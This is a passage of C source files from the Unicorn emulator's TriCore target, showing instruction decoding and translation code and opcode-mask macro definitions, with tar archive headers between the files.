OPCM_32_ABS_STORE: decode_abs_store(ctx); break; case OPCM_32_ABS_STOREB_H: decode_abs_storeb_h(ctx); break; case OPC1_32_ABS_STOREQ: address = MASK_OP_ABS_OFF18(ctx->opcode); r1 = MASK_OP_ABS_S1D(ctx->opcode); temp = tcg_const_i32(tcg_ctx, EA_ABS_FORMAT(address)); temp2 = tcg_temp_new(tcg_ctx); tcg_gen_shri_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r1], 16); tcg_gen_qemu_st_tl(tcg_ctx, temp2, temp, ctx->mem_idx, MO_LEUW); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free(tcg_ctx, temp); break; case OPC1_32_ABS_LD_Q: address = MASK_OP_ABS_OFF18(ctx->opcode); r1 = MASK_OP_ABS_S1D(ctx->opcode); temp = tcg_const_i32(tcg_ctx, EA_ABS_FORMAT(address)); tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp, ctx->mem_idx, MO_LEUW); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], 16); tcg_temp_free(tcg_ctx, temp); break; case OPC1_32_ABS_LEA: address = MASK_OP_ABS_OFF18(ctx->opcode); r1 = MASK_OP_ABS_S1D(ctx->opcode); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], EA_ABS_FORMAT(address)); break; /* ABSB-format */ case OPC1_32_ABSB_ST_T: address = MASK_OP_ABS_OFF18(ctx->opcode); b = MASK_OP_ABSB_B(ctx->opcode); bpos = MASK_OP_ABSB_BPOS(ctx->opcode); temp = tcg_const_i32(tcg_ctx, EA_ABS_FORMAT(address)); temp2 = tcg_temp_new(tcg_ctx); tcg_gen_qemu_ld_tl(tcg_ctx, temp2, temp, ctx->mem_idx, MO_UB); tcg_gen_andi_tl(tcg_ctx, temp2, temp2, ~(0x1u << bpos)); tcg_gen_ori_tl(tcg_ctx, temp2, temp2, (b << bpos)); tcg_gen_qemu_st_tl(tcg_ctx, temp2, temp, ctx->mem_idx, MO_UB); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); break; /* B-format */ case OPC1_32_B_CALL: case OPC1_32_B_CALLA: case OPC1_32_B_FCALL: case OPC1_32_B_FCALLA: case OPC1_32_B_J: case OPC1_32_B_JA: case OPC1_32_B_JL: case OPC1_32_B_JLA: address = MASK_OP_B_DISP24_SEXT(ctx->opcode); gen_compute_branch(ctx, op1, 0, 0, 0, address); break; /* Bit-format */ case OPCM_32_BIT_ANDACC: decode_bit_andacc(ctx); break; case OPCM_32_BIT_LOGICAL_T1: decode_bit_logical_t(ctx); break; case OPCM_32_BIT_INSERT: decode_bit_insert(ctx); break; case OPCM_32_BIT_LOGICAL_T2: decode_bit_logical_t2(ctx); break; case OPCM_32_BIT_ORAND: decode_bit_orand(ctx); break; case OPCM_32_BIT_SH_LOGIC1: decode_bit_sh_logic1(ctx); break; case OPCM_32_BIT_SH_LOGIC2: decode_bit_sh_logic2(ctx); break; /* BO Format */ case OPCM_32_BO_ADDRMODE_POST_PRE_BASE: decode_bo_addrmode_post_pre_base(ctx); break; case OPCM_32_BO_ADDRMODE_BITREVERSE_CIRCULAR: decode_bo_addrmode_bitreverse_circular(ctx); break; case OPCM_32_BO_ADDRMODE_LD_POST_PRE_BASE: decode_bo_addrmode_ld_post_pre_base(ctx); break; case OPCM_32_BO_ADDRMODE_LD_BITREVERSE_CIRCULAR: decode_bo_addrmode_ld_bitreverse_circular(ctx); break; case OPCM_32_BO_ADDRMODE_STCTX_POST_PRE_BASE: decode_bo_addrmode_stctx_post_pre_base(ctx); break; case OPCM_32_BO_ADDRMODE_LDMST_BITREVERSE_CIRCULAR: decode_bo_addrmode_ldmst_bitreverse_circular(ctx); break; /* BOL-format */ case OPC1_32_BOL_LD_A_LONGOFF: case OPC1_32_BOL_LD_W_LONGOFF: case OPC1_32_BOL_LEA_LONGOFF: case OPC1_32_BOL_ST_W_LONGOFF: case OPC1_32_BOL_ST_A_LONGOFF: case OPC1_32_BOL_LD_B_LONGOFF: case OPC1_32_BOL_LD_BU_LONGOFF: case OPC1_32_BOL_LD_H_LONGOFF: case OPC1_32_BOL_LD_HU_LONGOFF: case OPC1_32_BOL_ST_B_LONGOFF: case OPC1_32_BOL_ST_H_LONGOFF: decode_bol_opc(ctx, op1); break; /* BRC Format */ case OPCM_32_BRC_EQ_NEQ: case OPCM_32_BRC_GE: case OPCM_32_BRC_JLT: case OPCM_32_BRC_JNE: const4 = MASK_OP_BRC_CONST4_SEXT(ctx->opcode); address = MASK_OP_BRC_DISP15_SEXT(ctx->opcode); r1 = MASK_OP_BRC_S1(ctx->opcode); gen_compute_branch(ctx, op1, r1, 0, const4, address); break; /* BRN Format */ case OPCM_32_BRN_JTT: address = MASK_OP_BRN_DISP15_SEXT(ctx->opcode); r1 = MASK_OP_BRN_S1(ctx->opcode); gen_compute_branch(ctx, op1, r1, 0, 0, address); break; /* BRR Format */ case OPCM_32_BRR_EQ_NEQ: case OPCM_32_BRR_ADDR_EQ_NEQ: case OPCM_32_BRR_GE: case OPCM_32_BRR_JLT: case OPCM_32_BRR_JNE: case OPCM_32_BRR_JNZ: case OPCM_32_BRR_LOOP: address = MASK_OP_BRR_DISP15_SEXT(ctx->opcode); r2 = MASK_OP_BRR_S2(ctx->opcode); r1 = MASK_OP_BRR_S1(ctx->opcode); gen_compute_branch(ctx, op1, r1, r2, 0, address); break; /* RC Format */ case OPCM_32_RC_LOGICAL_SHIFT: decode_rc_logical_shift(ctx); break; case OPCM_32_RC_ACCUMULATOR: decode_rc_accumulator(ctx); break; case OPCM_32_RC_SERVICEROUTINE: decode_rc_serviceroutine(ctx); break; case OPCM_32_RC_MUL: decode_rc_mul(ctx); break; /* RCPW Format */ case OPCM_32_RCPW_MASK_INSERT: decode_rcpw_insert(ctx); break; /* RCRR Format */ case OPC1_32_RCRR_INSERT: r1 = MASK_OP_RCRR_S1(ctx->opcode); r2 = MASK_OP_RCRR_S3(ctx->opcode); r3 = MASK_OP_RCRR_D(ctx->opcode); const16 = MASK_OP_RCRR_CONST4(ctx->opcode); temp = tcg_const_i32(tcg_ctx, const16); temp2 = tcg_temp_new(tcg_ctx); /* width*/ temp3 = tcg_temp_new(tcg_ctx); /* pos */ CHECK_REG_PAIR(r3); tcg_gen_andi_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r3+1], 0x1f); tcg_gen_andi_tl(tcg_ctx, temp3, tcg_ctx->cpu_gpr_d[r3], 0x1f); gen_insert(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], temp, temp2, temp3); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free(tcg_ctx, temp3); break; /* RCRW Format */ case OPCM_32_RCRW_MASK_INSERT: decode_rcrw_insert(ctx); break; /* RCR Format */ case OPCM_32_RCR_COND_SELECT: decode_rcr_cond_select(ctx); break; case OPCM_32_RCR_MADD: decode_rcr_madd(ctx); break; case OPCM_32_RCR_MSUB: decode_rcr_msub(ctx); break; /* RLC Format */ case OPC1_32_RLC_ADDI: case OPC1_32_RLC_ADDIH: case OPC1_32_RLC_ADDIH_A: case OPC1_32_RLC_MFCR: case OPC1_32_RLC_MOV: case OPC1_32_RLC_MOV_64: case OPC1_32_RLC_MOV_U: case OPC1_32_RLC_MOV_H: case OPC1_32_RLC_MOVH_A: case OPC1_32_RLC_MTCR: decode_rlc_opc(ctx, op1); break; /* RR Format */ case OPCM_32_RR_ACCUMULATOR: decode_rr_accumulator(ctx); break; case OPCM_32_RR_LOGICAL_SHIFT: decode_rr_logical_shift(ctx); break; case OPCM_32_RR_ADDRESS: decode_rr_address(ctx); break; case OPCM_32_RR_IDIRECT: decode_rr_idirect(ctx); break; case OPCM_32_RR_DIVIDE: decode_rr_divide(ctx); break; /* RR1 Format */ case OPCM_32_RR1_MUL: decode_rr1_mul(ctx); break; case OPCM_32_RR1_MULQ: decode_rr1_mulq(ctx); break; /* RR2 format */ case OPCM_32_RR2_MUL: decode_rr2_mul(ctx); break; /* RRPW format */ case OPCM_32_RRPW_EXTRACT_INSERT: decode_rrpw_extract_insert(ctx); break; case OPC1_32_RRPW_DEXTR: r1 = MASK_OP_RRPW_S1(ctx->opcode); r2 = MASK_OP_RRPW_S2(ctx->opcode); r3 = MASK_OP_RRPW_D(ctx->opcode); const16 = MASK_OP_RRPW_POS(ctx->opcode); if (r1 == r2) { tcg_gen_rotli_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], const16); } else { temp = tcg_temp_new(tcg_ctx); tcg_gen_shli_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], const16); tcg_gen_shri_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r2], 32 - const16); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3], temp); tcg_temp_free(tcg_ctx, temp); } break; /* RRR Format */ case OPCM_32_RRR_COND_SELECT: decode_rrr_cond_select(ctx); break; case OPCM_32_RRR_DIVIDE: decode_rrr_divide(ctx); break; /* RRR2 Format */ case OPCM_32_RRR2_MADD: decode_rrr2_madd(ctx); break; case OPCM_32_RRR2_MSUB: decode_rrr2_msub(ctx); break; /* RRR1 format */ case OPCM_32_RRR1_MADD: decode_rrr1_madd(ctx); break; case OPCM_32_RRR1_MADDQ_H: decode_rrr1_maddq_h(ctx); break; case OPCM_32_RRR1_MADDSU_H: decode_rrr1_maddsu_h(ctx); break; case OPCM_32_RRR1_MSUB_H: decode_rrr1_msub(ctx); break; case OPCM_32_RRR1_MSUB_Q: decode_rrr1_msubq_h(ctx); break; case OPCM_32_RRR1_MSUBAD_H: decode_rrr1_msubad_h(ctx); break; /* RRRR format */ case OPCM_32_RRRR_EXTRACT_INSERT: decode_rrrr_extract_insert(ctx); break; /* RRRW format */ case OPCM_32_RRRW_EXTRACT_INSERT: decode_rrrw_extract_insert(ctx); break; /* SYS format */ case OPCM_32_SYS_INTERRUPTS: decode_sys_interrupts(ctx); break; case OPC1_32_SYS_RSTV: tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, 0); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, tcg_ctx->cpu_PSW_V); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_V); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static bool tricore_insn_is_16bit(uint32_t insn) { return (insn & 0x1) == 0; } static void tricore_tr_init_disas_context(DisasContextBase *dcbase, CPUState *cs) { DisasContext *ctx = container_of(dcbase, DisasContext, base); CPUTriCoreState *env = cs->env_ptr; // unicorn setup ctx->uc = cs->uc; ctx->mem_idx = cpu_mmu_index(env, false); ctx->hflags = (uint32_t)ctx->base.tb->flags; ctx->features = env->features; } static void tricore_tr_tb_start(DisasContextBase *db, CPUState *cpu) { } static void tricore_tr_insn_start(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *ctx = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_insn_start(tcg_ctx, ctx->base.pc_next); } static bool insn_crosses_page(CPUTriCoreState *env, DisasContext *ctx) { /* * Return true if the insn at ctx->base.pc_next might cross a page boundary. * (False positives are OK, false negatives are not.) * Our caller ensures we are only called if dc->base.pc_next is less than * 4 bytes from the page boundary, so we cross the page if the first * 16 bits indicate that this is a 32 bit insn. */ uint16_t insn = cpu_lduw_code(env, ctx->base.pc_next); return !tricore_insn_is_16bit(insn); } static void tricore_tr_translate_insn(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *ctx = container_of(dcbase, DisasContext, base); struct uc_struct *uc = ctx->uc; TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CPUTriCoreState *env = cpu->env_ptr; uint16_t insn_lo; bool is_16bit; uint32_t insn_size; // Unicorn: end address tells us to stop emulation if (uc_addr_is_exit(uc, ctx->base.pc_next)) { ctx->base.is_jmp = DISAS_UC_EXIT; } else { insn_lo = cpu_lduw_code(env, ctx->base.pc_next); is_16bit = tricore_insn_is_16bit(insn_lo); insn_size = is_16bit ? 2 : 4; // Unicorn: trace this instruction on request if (HOOK_EXISTS_BOUNDED(ctx->uc, UC_HOOK_CODE, ctx->base.pc_next)) { // Sync PC in advance gen_save_pc(ctx, ctx->base.pc_next); gen_uc_tracecode(tcg_ctx, insn_size, UC_HOOK_CODE_IDX, ctx->uc, ctx->base.pc_next); // the callback might want to stop emulation immediately check_exit_request(tcg_ctx); } if (is_16bit) { ctx->opcode = insn_lo; ctx->pc_succ_insn = ctx->base.pc_next + 2; decode_16Bit_opc(ctx); } else { uint32_t insn_hi = cpu_lduw_code(env, ctx->base.pc_next + 2); ctx->opcode = insn_hi << 16 | insn_lo; ctx->pc_succ_insn = ctx->base.pc_next + 4; decode_32Bit_opc(ctx); } ctx->base.pc_next = ctx->pc_succ_insn; if (ctx->base.is_jmp == DISAS_NEXT) { target_ulong page_start; page_start = ctx->base.pc_first & TARGET_PAGE_MASK; if (ctx->base.pc_next - page_start >= TARGET_PAGE_SIZE || (ctx->base.pc_next - page_start >= TARGET_PAGE_SIZE - 3 && insn_crosses_page(env, ctx))) { ctx->base.is_jmp = DISAS_TOO_MANY; } } } } static void tricore_tr_tb_stop(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *ctx = container_of(dcbase, DisasContext, base); // if (ctx->base.singlestep_enabled && ctx->base.is_jmp != DISAS_NORETURN) { // save_cpu_state(ctx, ctx->base.is_jmp != DISAS_EXIT); // gen_helper_raise_exception_debug(tcg_ctx, tcg_ctx->cpu_env); // } else { switch (ctx->base.is_jmp) { case DISAS_TOO_MANY: gen_goto_tb(ctx, 0, ctx->base.pc_next); break; case DISAS_UC_EXIT: gen_save_pc(ctx, ctx->base.pc_next); gen_helper_uc_tricore_exit(ctx->uc->tcg_ctx, ctx->uc->tcg_ctx->cpu_env); break; case DISAS_NORETURN: break; default: g_assert_not_reached(); } } static const TranslatorOps tricore_tr_ops = { .init_disas_context = tricore_tr_init_disas_context, .tb_start = tricore_tr_tb_start, .insn_start = tricore_tr_insn_start, .translate_insn = tricore_tr_translate_insn, .tb_stop = tricore_tr_tb_stop, }; void gen_intermediate_code(CPUState *cs, TranslationBlock *tb, int max_insns) { DisasContext ctx; memset(&ctx, 0, sizeof(ctx)); translator_loop(&tricore_tr_ops, &ctx.base, cs, tb, max_insns); } void restore_state_to_opc(CPUTriCoreState *env, TranslationBlock *tb, target_ulong *data) { env->PC = data[0]; } /* * * Initialization * */ void cpu_state_reset(CPUTriCoreState *env) { /* Reset Regs to Default Value */ env->PSW = 0xb80; fpu_set_state(env); } static void tricore_tcg_init_csfr(struct uc_struct *uc) { TCGContext *tcg_ctx = uc->tcg_ctx; tcg_ctx->cpu_PCXI = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUTriCoreState, PCXI), "PCXI"); tcg_ctx->cpu_PSW = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUTriCoreState, PSW), "PSW"); tcg_ctx->cpu_PC = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUTriCoreState, PC), "PC"); tcg_ctx->cpu_ICR = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUTriCoreState, ICR), "ICR"); } void tricore_tcg_init(struct uc_struct *uc) { TCGContext *tcg_ctx = uc->tcg_ctx; int i; /* reg init */ for (i = 0 ; i < 16 ; i++) { tcg_ctx->cpu_gpr_a[i] = tcg_global_mem_new(uc->tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUTriCoreState, gpr_a[i]), regnames_a[i]); } for (i = 0 ; i < 16 ; i++) { tcg_ctx->cpu_gpr_d[i] = tcg_global_mem_new(uc->tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUTriCoreState, gpr_d[i]), regnames_d[i]); } tricore_tcg_init_csfr(uc); /* init PSW flag cache */ tcg_ctx->cpu_PSW_C = tcg_global_mem_new(uc->tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUTriCoreState, PSW_USB_C), "PSW_C"); tcg_ctx->cpu_PSW_V = tcg_global_mem_new(uc->tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUTriCoreState, PSW_USB_V), "PSW_V"); tcg_ctx->cpu_PSW_SV = tcg_global_mem_new(uc->tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUTriCoreState, PSW_USB_SV), "PSW_SV"); tcg_ctx->cpu_PSW_AV = tcg_global_mem_new(uc->tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUTriCoreState, PSW_USB_AV), "PSW_AV"); tcg_ctx->cpu_PSW_SAV = tcg_global_mem_new(uc->tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUTriCoreState, PSW_USB_SAV), "PSW_SAV"); } �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/tricore/tricore-defs.h����������������������������������������������������0000664�0000000�0000000�00000001550�14675241067�0021650�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Copyright (c) 2012-2014 Bastian Koppelmann C-Lab/University Paderborn * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #ifndef QEMU_TRICORE_DEFS_H #define QEMU_TRICORE_DEFS_H #define TRICORE_TLB_MAX 128 #endif /* QEMU_TRICORE_DEFS_H */ ��������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/tricore/tricore-opcodes.h�������������������������������������������������0000664�0000000�0000000�00000205111�14675241067�0022362�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Copyright (c) 2012-2014 Bastian Koppelmann C-Lab/University Paderborn * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #ifndef TARGET_TRICORE_TRICORE_OPCODES_H #define TARGET_TRICORE_TRICORE_OPCODES_H /* * Opcode Masks for Tricore * Format MASK_OP_InstrFormatName_Field */ /* This creates a mask with bits start .. end set to 1 and applies it to op */ #define MASK_BITS_SHIFT(op, start, end) (extract32(op, (start), \ (end) - (start) + 1)) #define MASK_BITS_SHIFT_SEXT(op, start, end) (sextract32(op, (start),\ (end) - (start) + 1)) /* new opcode masks */ #define MASK_OP_MAJOR(op) MASK_BITS_SHIFT(op, 0, 7) /* 16-Bit Formats */ #define MASK_OP_SB_DISP8(op) MASK_BITS_SHIFT(op, 8, 15) #define MASK_OP_SB_DISP8_SEXT(op) MASK_BITS_SHIFT_SEXT(op, 8, 15) #define MASK_OP_SBC_CONST4(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_SBC_CONST4_SEXT(op) MASK_BITS_SHIFT_SEXT(op, 12, 15) #define MASK_OP_SBC_DISP4(op) MASK_BITS_SHIFT(op, 8, 11) #define MASK_OP_SBR_S2(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_SBR_DISP4(op) MASK_BITS_SHIFT(op, 8, 11) #define MASK_OP_SBRN_N(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_SBRN_DISP4(op) MASK_BITS_SHIFT(op, 8, 11) #define MASK_OP_SC_CONST8(op) MASK_BITS_SHIFT(op, 8, 15) #define MASK_OP_SLR_S2(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_SLR_D(op) MASK_BITS_SHIFT(op, 8, 11) #define MASK_OP_SLRO_OFF4(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_SLRO_D(op) MASK_BITS_SHIFT(op, 8, 11) #define MASK_OP_SR_OP2(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_SR_S1D(op) MASK_BITS_SHIFT(op, 8, 11) #define MASK_OP_SRC_CONST4(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_SRC_CONST4_SEXT(op) MASK_BITS_SHIFT_SEXT(op, 12, 15) #define MASK_OP_SRC_S1D(op) MASK_BITS_SHIFT(op, 8, 11) #define MASK_OP_SRO_S2(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_SRO_OFF4(op) MASK_BITS_SHIFT(op, 8, 11) #define MASK_OP_SRR_S2(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_SRR_S1D(op) MASK_BITS_SHIFT(op, 8, 11) #define MASK_OP_SRRS_S2(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_SRRS_S1D(op) MASK_BITS_SHIFT(op, 8, 11) #define MASK_OP_SRRS_N(op) MASK_BITS_SHIFT(op, 6, 7) #define MASK_OP_SSR_S2(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_SSR_S1(op) MASK_BITS_SHIFT(op, 8, 11) #define MASK_OP_SSRO_OFF4(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_SSRO_S1(op) MASK_BITS_SHIFT(op, 8, 11) /* 32-Bit Formats */ /* ABS Format */ #define MASK_OP_ABS_OFF18(op) (MASK_BITS_SHIFT(op, 16, 21) + \ (MASK_BITS_SHIFT(op, 28, 31) << 6) + \ (MASK_BITS_SHIFT(op, 22, 25) << 10) +\ (MASK_BITS_SHIFT(op, 12, 15) << 14)) #define MASK_OP_ABS_OP2(op) MASK_BITS_SHIFT(op, 26, 27) #define MASK_OP_ABS_S1D(op) MASK_BITS_SHIFT(op, 8, 11) /* ABSB Format */ #define MASK_OP_ABSB_OFF18(op) MASK_OP_ABS_OFF18(op) #define MASK_OP_ABSB_OP2(op) MASK_BITS_SHIFT(op, 26, 27) #define MASK_OP_ABSB_B(op) MASK_BITS_SHIFT(op, 11, 11) #define MASK_OP_ABSB_BPOS(op) MASK_BITS_SHIFT(op, 8, 10) /* B Format */ #define MASK_OP_B_DISP24(op) (MASK_BITS_SHIFT(op, 16, 31) + \ (MASK_BITS_SHIFT(op, 8, 15) << 16)) #define MASK_OP_B_DISP24_SEXT(op) (MASK_BITS_SHIFT(op, 16, 31) + \ (MASK_BITS_SHIFT_SEXT(op, 8, 15) << 16)) /* BIT Format */ #define MASK_OP_BIT_D(op) MASK_BITS_SHIFT(op, 28, 31) #define MASK_OP_BIT_POS2(op) MASK_BITS_SHIFT(op, 23, 27) #define MASK_OP_BIT_OP2(op) MASK_BITS_SHIFT(op, 21, 22) #define MASK_OP_BIT_POS1(op) MASK_BITS_SHIFT(op, 16, 20) #define MASK_OP_BIT_S2(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_BIT_S1(op) MASK_BITS_SHIFT(op, 8, 11) /* BO Format */ #define MASK_OP_BO_OFF10(op) (MASK_BITS_SHIFT(op, 16, 21) + \ (MASK_BITS_SHIFT(op, 28, 31) << 6)) #define MASK_OP_BO_OFF10_SEXT(op) (MASK_BITS_SHIFT(op, 16, 21) + \ (MASK_BITS_SHIFT_SEXT(op, 28, 31) << 6)) #define MASK_OP_BO_OP2(op) MASK_BITS_SHIFT(op, 22, 27) #define MASK_OP_BO_S2(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_BO_S1D(op) MASK_BITS_SHIFT(op, 8, 11) /* BOL Format */ #define MASK_OP_BOL_OFF16(op) ((MASK_BITS_SHIFT(op, 16, 21) + \ (MASK_BITS_SHIFT(op, 28, 31) << 6)) + \ (MASK_BITS_SHIFT(op, 22, 27) << 10)) #define MASK_OP_BOL_OFF16_SEXT(op) ((MASK_BITS_SHIFT(op, 16, 21) + \ (MASK_BITS_SHIFT(op, 28, 31) << 6)) + \ (MASK_BITS_SHIFT_SEXT(op, 22, 27) << 10)) #define MASK_OP_BOL_S2(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_BOL_S1D(op) MASK_BITS_SHIFT(op, 8, 11) /* BRC Format */ #define MASK_OP_BRC_OP2(op) MASK_BITS_SHIFT(op, 31, 31) #define MASK_OP_BRC_DISP15(op) MASK_BITS_SHIFT(op, 16, 30) #define MASK_OP_BRC_DISP15_SEXT(op) MASK_BITS_SHIFT_SEXT(op, 16, 30) #define MASK_OP_BRC_CONST4(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_BRC_CONST4_SEXT(op) MASK_BITS_SHIFT_SEXT(op, 12, 15) #define MASK_OP_BRC_S1(op) MASK_BITS_SHIFT(op, 8, 11) /* BRN Format */ #define MASK_OP_BRN_OP2(op) MASK_BITS_SHIFT(op, 31, 31) #define MASK_OP_BRN_DISP15(op) MASK_BITS_SHIFT(op, 16, 30) #define MASK_OP_BRN_DISP15_SEXT(op) MASK_BITS_SHIFT_SEXT(op, 16, 30) #define MASK_OP_BRN_N(op) (MASK_BITS_SHIFT(op, 12, 15) + \ (MASK_BITS_SHIFT(op, 7, 7) << 4)) #define MASK_OP_BRN_S1(op) MASK_BITS_SHIFT(op, 8, 11) /* BRR Format */ #define MASK_OP_BRR_OP2(op) MASK_BITS_SHIFT(op, 31, 31) #define MASK_OP_BRR_DISP15(op) MASK_BITS_SHIFT(op, 16, 30) #define MASK_OP_BRR_DISP15_SEXT(op) MASK_BITS_SHIFT_SEXT(op, 16, 30) #define MASK_OP_BRR_S2(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_BRR_S1(op) MASK_BITS_SHIFT(op, 8, 11) /* META MASK for similar instr Formats */ #define MASK_OP_META_D(op) MASK_BITS_SHIFT(op, 28, 31) #define MASK_OP_META_S1(op) MASK_BITS_SHIFT(op, 8, 11) /* RC Format */ #define MASK_OP_RC_D(op) MASK_OP_META_D(op) #define MASK_OP_RC_OP2(op) MASK_BITS_SHIFT(op, 21, 27) #define MASK_OP_RC_CONST9(op) MASK_BITS_SHIFT(op, 12, 20) #define MASK_OP_RC_CONST9_SEXT(op) MASK_BITS_SHIFT_SEXT(op, 12, 20) #define MASK_OP_RC_S1(op) MASK_OP_META_S1(op) /* RCPW Format */ #define MASK_OP_RCPW_D(op) MASK_OP_META_D(op) #define MASK_OP_RCPW_POS(op) MASK_BITS_SHIFT(op, 23, 27) #define MASK_OP_RCPW_OP2(op) MASK_BITS_SHIFT(op, 21, 22) #define MASK_OP_RCPW_WIDTH(op) MASK_BITS_SHIFT(op, 16, 20) #define MASK_OP_RCPW_CONST4(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_RCPW_S1(op) MASK_OP_META_S1(op) /* RCR Format */ #define MASK_OP_RCR_D(op) MASK_OP_META_D(op) #define MASK_OP_RCR_S3(op) MASK_BITS_SHIFT(op, 24, 27) #define MASK_OP_RCR_OP2(op) MASK_BITS_SHIFT(op, 21, 23) #define MASK_OP_RCR_CONST9(op) MASK_BITS_SHIFT(op, 12, 20) #define MASK_OP_RCR_CONST9_SEXT(op) MASK_BITS_SHIFT_SEXT(op, 12, 20) #define MASK_OP_RCR_S1(op) MASK_OP_META_S1(op) /* RCRR Format */ #define MASK_OP_RCRR_D(op) MASK_OP_META_D(op) #define MASK_OP_RCRR_S3(op) MASK_BITS_SHIFT(op, 24, 27) #define MASK_OP_RCRR_OP2(op) MASK_BITS_SHIFT(op, 21, 23) #define MASK_OP_RCRR_CONST4(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_RCRR_S1(op) MASK_OP_META_S1(op) /* RCRW Format */ #define MASK_OP_RCRW_D(op) MASK_OP_META_D(op) #define MASK_OP_RCRW_S3(op) MASK_BITS_SHIFT(op, 24, 27) #define MASK_OP_RCRW_OP2(op) MASK_BITS_SHIFT(op, 21, 23) #define MASK_OP_RCRW_WIDTH(op) MASK_BITS_SHIFT(op, 16, 20) #define MASK_OP_RCRW_CONST4(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_RCRW_S1(op) MASK_OP_META_S1(op) /* RLC Format */ #define MASK_OP_RLC_D(op) MASK_OP_META_D(op) #define MASK_OP_RLC_CONST16(op) MASK_BITS_SHIFT(op, 12, 27) #define MASK_OP_RLC_CONST16_SEXT(op) MASK_BITS_SHIFT_SEXT(op, 12, 27) #define MASK_OP_RLC_S1(op) MASK_OP_META_S1(op) /* RR Format */ #define MASK_OP_RR_D(op) MASK_OP_META_D(op) #define MASK_OP_RR_OP2(op) MASK_BITS_SHIFT(op, 20, 27) #define MASK_OP_RR_N(op) MASK_BITS_SHIFT(op, 16, 17) #define MASK_OP_RR_S2(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_RR_S1(op) MASK_OP_META_S1(op) /* RR1 Format */ #define 